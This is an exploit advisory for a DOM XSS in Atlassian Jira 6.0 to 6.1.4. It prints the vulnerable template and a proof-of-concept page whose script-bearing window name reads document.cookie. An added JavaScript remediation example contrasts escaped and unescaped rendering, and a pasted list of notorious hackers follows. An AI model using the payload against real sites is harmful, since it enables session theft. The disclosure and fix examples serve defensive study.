Atlassian Jira 6.0.* <= 6.1.4 DOM XSS [Unauthenticated]

TeslaMotors Bug Bounty - DOM XSS - PoC
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com

---[ Vulnerable Code ]---

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div>

---[ Proof of Concept ]---

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html>  
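
Added example, not code from the advisory or from Atlassian: the template's unescaped insertion beside a hardened form that HTML-encodes the window name before it reaches the header. Function names are hypothetical, and it assumes the template places the value into the page as markup, as the proof of concept implies.

```javascript
// Added example: function names are hypothetical, not Jira's own code.
// window.name is set by whoever opened the window, so it is untrusted input.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

// Encode the characters that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Mirrors the template from the advisory: the value is concatenated as markup.
function renderHeaderUnsafe(name) {
  return '<div class="aui-page-header-main">\n  <h1>' + name + '</h1>\n</div>';
}

// Hardened form: the value is encoded before it is placed in element content.
// In browser code, assigning to h1.textContent achieves the same result.
function renderHeaderSafe(name) {
  return '<div class="aui-page-header-main">\n  <h1>' + escapeHtml(name) + '</h1>\n</div>';
}

// Regression check: true if the fragment contains any tag other than div/h1.
function containsInjectedTag(html) {
  const tags = html.match(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g) || [];
  return tags.some((t) => !/^<\/?(div|h1)$/i.test(t));
}

// Constructed input: the window name string from the proof of concept above.
const sampleName = '<script>alert(document.cookie);</script>';

console.log('unsafe injects a tag:', containsInjectedTag(renderHeaderUnsafe(sampleName)));
console.log('safe injects a tag:  ', containsInjectedTag(renderHeaderSafe(sampleName)));
console.log(renderHeaderSafe(sampleName));
```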

Top10Archive: Top 10 Notorious Hackers Around The World

Quote: "Welcome to Top10Archive! In today’s day and age the internet can become a battleground for cyber wars. Hackers have been known to take down crucial websites, steal credit card information, take down gaming servers, and even use their expertise to assist government agencies. In the cyber world, some of these hackers have gained quite a bit of fame for their computer expertise, becoming some of the most notorious hackers in internet history."


10. Lizard Squad
9. Johnathan James
8. Syrian Electronic Army
7. Gary McKinnon
6. Jeanson Ancheta
5. Kevin Mitnick
4. Kristina Svechinskaya
3. ASTRA
2. TinKode
1. Anonymous